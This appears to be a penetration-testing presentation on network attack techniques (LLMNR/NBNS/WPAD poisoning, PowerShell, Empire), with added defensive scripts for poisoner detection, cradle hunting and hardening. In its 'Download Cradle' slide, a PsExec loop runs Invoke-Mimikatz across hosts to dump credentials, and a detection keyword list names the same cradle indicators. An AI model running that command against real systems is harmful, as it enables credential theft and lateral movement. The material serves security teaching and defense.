Common Network Penetration Testing Techniques Russel Van Tuyl.

Russel C. Van Tuyl, Security Analyst, Sword & Shield Enterprise Security, 1431 Centerpoint Blvd., Suite 150, Knoxville, TN. Security Analyst, TN Air National Guard. SANS MSISE student. Father of 2, husband to 1.

This is how I hack!

Hack All The Things
External Network
(Web) Apps
Internal Network
Social Engineering
Wireless
Physical

Methodology
Recon/Intel Gathering
Vulnerability Identification/Analysis
Exploitation
Post Exploitation
Reporting (boo)

Phishing

Social Engineering - Pretext

External Assessment

Internal Assessment

How I see networks

Broadcast Messages
Go to every host on the subnet, typically in search of a resource (like name resolution)
Common Windows broadcast protocols: NetBIOS (RFC 1001 & 1002), LLMNR RFC (link-scope multicast)
Types: Windows Redirector, File Server, Print Server, WPAD

NetBIOS Name Service (NBNS) Broadcast Messages

Link-Local Multicast Name Resolution (LLMNR) Multicast Messages

Web Proxy Autodiscovery Protocol (WPAD)
Standard: Internet Engineering Task Force (IETF) draft, expired December 1999
Discovery: DHCP, DNS
Proxy Auto-Config (PAC) file: wpad.dat

Responder by Laurent Trustwave SpiderLabs
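The three slides above describe how NBNS, LLMNR and WPAD let a host on the segment answer name lookups nobody asked it to answer. The script below is an added example, not code from the slides or from Responder: it asks for a random hostname that no legitimate machine owns, first over LLMNR (multicast 224.0.0.252, UDP 5355, plain DNS wire format) and then over NBNS (limited broadcast, UDP 137, RFC 1001 first-level encoded name). A clean segment returns nothing; any answer comes from a host willing to claim a name it does not have, which is exactly what a poisoner does. Assumed: Windows PowerShell 5 or later, a stateful host firewall that lets the replies back in, and a 2 second listen window.

```powershell
# Added example (not from the slides): probe the local segment for LLMNR/NBNS poisoners
# by querying a random, nonexistent name and reporting whoever answers.

function ConvertTo-DnsLabels {
    # "abc.example" -> [3]abc[7]example[0]  (LLMNR uses the DNS name format)
    param([string]$Name)
    $out = New-Object System.Collections.Generic.List[byte]
    foreach ($label in $Name.Split('.')) {
        $b = [System.Text.Encoding]::ASCII.GetBytes($label)
        $out.Add([byte]$b.Length); $out.AddRange($b)
    }
    $out.Add(0)
    return ,$out.ToArray()
}

function ConvertTo-NetBiosName {
    # RFC 1001 first-level encoding: pad to 15 bytes, append the suffix byte
    # (0x00 = workstation), then emit two chars per byte: each nibble + 'A'.
    param([string]$Name, [byte]$Suffix = 0x00)
    $padded = $Name.ToUpper().PadRight(15).Substring(0, 15)
    $raw = [byte[]]([System.Text.Encoding]::ASCII.GetBytes($padded) + $Suffix)
    $out = New-Object System.Collections.Generic.List[byte]
    $out.Add(0x20)                                   # length of the encoded name (32)
    foreach ($b in $raw) {
        $out.Add([byte](0x41 + ($b -shr 4)))
        $out.Add([byte](0x41 + ($b -band 0x0F)))
    }
    $out.Add(0)
    return ,$out.ToArray()
}

function New-NameQuery {
    # DNS-style header (ID, FLAGS, QDCOUNT=1, AN/NS/AR=0) followed by one question.
    param([byte[]]$QName, [uint16]$Flags, [uint16]$QType)
    $id  = Get-Random -Minimum 1 -Maximum 65535
    $pkt = New-Object System.Collections.Generic.List[byte]
    foreach ($w in @($id, $Flags, 1, 0, 0, 0)) {
        $pkt.Add([byte](([int]$w -shr 8) -band 0xFF)); $pkt.Add([byte]([int]$w -band 0xFF))
    }
    $pkt.AddRange($QName)
    foreach ($w in @($QType, 1)) {                   # QTYPE, QCLASS = IN
        $pkt.Add([byte](([int]$w -shr 8) -band 0xFF)); $pkt.Add([byte]([int]$w -band 0xFF))
    }
    return ,$pkt.ToArray()
}

function Invoke-NameProbe {
    # Send one query, then collect every reply until the receive timeout fires.
    param([byte[]]$Packet, [string]$Address, [int]$Port, [int]$TimeoutMs = 2000)
    $udp = New-Object System.Net.Sockets.UdpClient
    try {
        $udp.EnableBroadcast = $true                 # needed for the NBNS 255.255.255.255 send
        $udp.Client.ReceiveTimeout = $TimeoutMs
        $target = New-Object System.Net.IPEndPoint -ArgumentList ([System.Net.IPAddress]::Parse($Address)), $Port
        [void]$udp.Send($Packet, $Packet.Length, $target)
        $seen = @()
        while ($true) {
            $from = New-Object System.Net.IPEndPoint -ArgumentList ([System.Net.IPAddress]::Any), 0
            try { $data = $udp.Receive([ref]$from) }
            catch [System.Net.Sockets.SocketException] { break }   # timeout: nobody (else) answered
            # QR bit set in byte 2 = this is an answer. Nobody owns the name, so flag the sender.
            if ($data.Length -ge 12 -and ($data[2] -band 0x80) -ne 0) {
                $seen += [pscustomobject]@{ Responder = $from.Address.ToString(); Answers = ($data[6] * 256 + $data[7]) }
            }
        }
        return $seen
    } finally { $udp.Close() }
}

# A random 12-letter name is legitimately unresolvable, so only a poisoner replies.
$probe = -join ((65..90) | Get-Random -Count 12 | ForEach-Object { [char]$_ })
$llmnr = Invoke-NameProbe -Address '224.0.0.252'     -Port 5355 -Packet (New-NameQuery -QName (ConvertTo-DnsLabels $probe)   -Flags 0x0000 -QType 1)
$nbns  = Invoke-NameProbe -Address '255.255.255.255' -Port 137  -Packet (New-NameQuery -QName (ConvertTo-NetBiosName $probe) -Flags 0x0110 -QType 0x20)
"LLMNR probe for $probe : $(if ($llmnr) { $llmnr.Responder -join ', ' } else { 'no answer (good)' })"
"NBNS  probe for $probe : $(if ($nbns)  { $nbns.Responder  -join ', ' } else { 'no answer (good)' })"
```

The NBNS flags 0x0110 set RD and the B (broadcast) bit per RFC 1002; LLMNR queries carry zero flags. If the box is multi-homed, the limited broadcast leaves on the default interface only, so run the probe once per segment or swap in that subnet's directed broadcast address. Do not probe with a name such as wpad: a legitimate proxy host would answer and hide the signal.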

runas.exe

Windows PowerShell is an interactive object-oriented command environment with scripting language features that utilizes small programs called cmdlets to simplify configuration, administration, and management of heterogeneous environments in both standalone and networked topologies by utilizing standards-based remoting protocols.

powershell.exe
Built on .NET Framework
Verb-Noun cmdlet names, tab completion, aliases
Structured data/objects
Syntax highlighting (version 5)
Released in 2006 on XP*/Vista/Server 2003
Scripts (.ps1) and modules (.psm1)
Integrated Scripting Environment (ISE)

Download Cradle

ForEach ($h in Get-Content C:\hosts.txt){C:\PsExec.exe \\$h -d -e -u ACME\bob -p -s cmd /c powershell -nop -command "& {IEX ((new-object net.webclient).downloadstring('\\ \data\Invoke-Mimikatz.ps1'));Invoke-Mimikatz -DumpCreds > \\ \data\%COMPUTERNAME%.txt}"}

questions?

Empire is a pure PowerShell post-exploitation agent built on cryptologically-secure communications and a flexible architecture. Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable post-exploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework. PowerShell Empire
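Two hunts follow directly from the cradle above and from Empire's ability to run agents without powershell.exe. Added example, not code from the slides or from the Empire project: with script block logging on, every block the engine compiles is written to Event ID 4104 whatever process hosts it, so the first function reads that log for cradle indicators; the second lists processes other than the usual PowerShell hosts that have System.Management.Automation loaded, which is what an unhosted agent looks like from the outside. Assumed: an elevated session on a host where script block logging is enabled; the indicator list is illustrative, not a complete signature set.

```powershell
# Added example (not from the slides or Empire): hunt for download cradles in the
# PowerShell operational log and for the PowerShell engine running outside powershell.exe.

function Find-CradleScriptBlocks {
    param(
        [int]$MaxEvents = 5000,
        # Illustrative indicators drawn from the cradle pattern; extend for your environment.
        [string[]]$Indicators = @('Net.WebClient', 'DownloadString', 'DownloadFile', 'IEX ', 'Invoke-Expression',
                                  '-nop', '-EncodedCommand', 'FromBase64String', 'Invoke-Mimikatz', 'DumpCreds')
    )
    $filter = @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 }
    foreach ($e in (Get-WinEvent -FilterHashtable $filter -MaxEvents $MaxEvents -ErrorAction SilentlyContinue)) {
        # 4104 payload: [0] MessageNumber, [1] MessageTotal, [2] ScriptBlockText, [3] ScriptBlockId, [4] Path
        $text = [string]$e.Properties[2].Value
        $hits = @($Indicators | Where-Object { $text.IndexOf($_, [StringComparison]::OrdinalIgnoreCase) -ge 0 })
        if ($hits.Count -gt 0) {
            [pscustomobject]@{
                Time          = $e.TimeCreated
                ScriptBlockId = $e.Properties[3].Value
                Path          = $e.Properties[4].Value     # empty for in-memory blocks, as with a cradle
                Indicators    = ($hits -join ', ')
                Snippet       = ($text.Substring(0, [Math]::Min(160, $text.Length)) -replace '\s+', ' ')
            }
        }
    }
}

function Find-UnhostedPowerShell {
    # Any process with the automation engine loaded that is not a known PowerShell host.
    $knownHosts = 'powershell', 'powershell_ise', 'pwsh'
    foreach ($p in Get-Process) {
        $mods = $null
        try { $mods = $p.Modules } catch { continue }      # access denied or 32/64-bit mismatch
        if (-not $mods) { continue }
        $engine = @($mods | Where-Object { $_.ModuleName -match '^System\.Management\.Automation(\.ni)?\.dll$' })
        if ($engine.Count -gt 0 -and $p.ProcessName -notin $knownHosts) {
            [pscustomobject]@{ Pid = $p.Id; Name = $p.ProcessName; Path = $p.Path; Engine = $engine[0].FileName }
        }
    }
}

Find-CradleScriptBlocks | Format-Table -AutoSize
Find-UnhostedPowerShell | Format-Table -AutoSize
```

Expect some legitimate hits from the second function (Server Manager, Exchange and management agents embed the engine); baseline those by image path and alert on the rest. The first function only sees what was logged, so it is a check on the logging control as much as on the attacker: an empty result on a host with known PowerShell activity means 4104 is not being written.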

Sensitive Data Image removed for distribution

Strong passwords, password database
Local Admin: disable & rename, implement LAPS
Credential theft: Protected LSASS, Privileged Access Workstations (PAWs)
Least privilege
Logging: PowerShell v5
Monitor & restrict egress
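Several of the defenses listed above reduce to a handful of registry values, a WMI call and one local account check. The script below is an added example, not code from the slides: Test-Hardening reports each control's current state, and Invoke-Hardening applies the settings with -WhatIf support. Assumed: an elevated Windows PowerShell 5.1 session on Windows 10/Server 2016 or later (for Get-LocalUser), and that C:\PSTranscripts is only a placeholder output directory. Turning off LLMNR and NetBIOS over TCP/IP breaks anything that still resolves names that way, and RunAsPPL (effective after a reboot) blocks unsigned LSA plugins, so test both before rolling out.

```powershell
# Added example (not from the slides): audit and apply the registry/WMI side of the
# listed controls. Values below are the documented policy keys; the transcript path is assumed.

$Settings = @(
    @{ Control = 'LLMNR disabled (EnableMulticast = 0)'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows NT\DNSClient'; Key = 'EnableMulticast'; Want = 0 }
    @{ Control = 'LSASS runs as a protected process (RunAsPPL)'
       Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa'; Key = 'RunAsPPL'; Want = 1 }
    @{ Control = 'PowerShell script block logging (Event ID 4104)'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'; Key = 'EnableScriptBlockLogging'; Want = 1 }
    @{ Control = 'PowerShell module logging (Event ID 4103)'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging'; Key = 'EnableModuleLogging'; Want = 1 }
    @{ Control = 'PowerShell transcription'
       Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'; Key = 'EnableTranscripting'; Want = 1 }
)

function Test-Hardening {
    # One row per control: current value, expected value, compliant or not.
    foreach ($s in $Settings) {
        $cur = (Get-ItemProperty -Path $s.Path -Name $s.Key -ErrorAction SilentlyContinue).($s.Key)
        [pscustomobject]@{ Control = $s.Control; Current = $cur; Expected = $s.Want; Compliant = ($cur -eq $s.Want) }
    }
    # The built-in Administrator is RID 500 whatever it has been renamed to.
    $admin = Get-LocalUser | Where-Object { $_.SID.Value -like 'S-1-5-21-*-500' }
    [pscustomobject]@{ Control = 'RID-500 local Administrator disabled'; Current = $admin.Enabled; Expected = $false; Compliant = (-not $admin.Enabled) }
    [pscustomobject]@{ Control = 'RID-500 local Administrator renamed';  Current = $admin.Name;    Expected = 'not Administrator'; Compliant = ($admin.Name -ne 'Administrator') }
    # NetBIOS over TCP/IP is per adapter: TcpipNetbiosOptions 2 = disabled.
    foreach ($nic in Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True') {
        [pscustomobject]@{ Control = "NetBIOS over TCP/IP disabled ($($nic.Description))"; Current = $nic.TcpipNetbiosOptions; Expected = 2; Compliant = ($nic.TcpipNetbiosOptions -eq 2) }
    }
}

function Invoke-Hardening {
    # Applies the settings above plus the extra keys they need. Run with -WhatIf first.
    [CmdletBinding(SupportsShouldProcess = $true)]
    param([string]$TranscriptDir = 'C:\PSTranscripts')   # assumed path; point it at a collected share
    $extra = @(
        @{ Path = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\Transcription'; Key = 'OutputDirectory'; Want = $TranscriptDir }
    )
    foreach ($s in ($Settings + $extra)) {
        if ($PSCmdlet.ShouldProcess("$($s.Path) [$($s.Key)]", "set to $($s.Want)")) {
            if (-not (Test-Path $s.Path)) { New-Item -Path $s.Path -Force | Out-Null }
            Set-ItemProperty -Path $s.Path -Name $s.Key -Value $s.Want   # int -> DWORD, string -> REG_SZ
        }
    }
    # Module logging only records modules listed under ModuleNames; '*' means all of them.
    $mn = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ModuleLogging\ModuleNames'
    if ($PSCmdlet.ShouldProcess($mn, 'log every module')) {
        if (-not (Test-Path $mn)) { New-Item -Path $mn -Force | Out-Null }
        New-ItemProperty -Path $mn -Name '*' -Value '*' -PropertyType String -Force | Out-Null
    }
    if ($PSCmdlet.ShouldProcess('all IP-enabled adapters', 'disable NetBIOS over TCP/IP')) {
        Get-CimInstance Win32_NetworkAdapterConfiguration -Filter 'IPEnabled = True' |
            Invoke-CimMethod -MethodName SetTcpipNetbios -Arguments @{ TcpipNetbiosOptions = [uint32]2 } | Out-Null
    }
}

Test-Hardening | Format-Table -AutoSize
# Invoke-Hardening -WhatIf      # preview
# Invoke-Hardening              # apply, then reboot for RunAsPPL to take effect
```

Disabling the local Administrator and deploying LAPS are deliberately left to your directory tooling: the check here tells you whether the RID-500 account is still enabled and still named Administrator, which is the state the attacker's PsExec loop above is counting on.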

Center for Internet Security (CIS) Critical Security Controls
CSC 1: Inventory of Authorized and Unauthorized Devices
CSC 2: Inventory of Authorized and Unauthorized Software
CSC 3: Secure Configurations for Hardware and Software on Mobile Devices, Laptops, Workstations, and Servers
CSC 4: Continuous Vulnerability Assessment and Remediation
CSC 5: Controlled Use of Administrative Privileges
CSC 6: Maintenance, Monitoring, and Analysis of Audit Logs
CSC 7: Email and Web Browser Protections
CSC 8: Malware Defenses
CSC 9: Limitation and Control of Network Ports, Protocols, and Services
CSC 10: Data Recovery Capability
CSC 11: Secure Configurations for Network Devices such as Firewalls, Routers, and Switches
CSC 12: Boundary Defense
CSC 13: Data Protection
CSC 14: Controlled Access Based on the Need to Know
CSC 15: Wireless Access Control
CSC 16: Account Monitoring and Control
CSC 17: Security Skills Assessment and Appropriate Training to Fill Gaps
CSC 18: Application Software Security
CSC 19: Incident Response and Management
CSC 20: Penetration Tests and Red Team Exercises

How To Get Owned in 10 Easy Steps
1. Don't patch anything
2. Don't harden servers
3. Use default/weak passwords, in multiple places
4. Use shared accounts/passwords
5. Use poorly written applications
6. Allow unrestricted inbound traffic
7. Allow unrestricted outbound traffic
8. Use the highest possible privilege levels
9. Put everything on the Internet (bcuz YOLO!)
10. Assume everything is OK

Questions?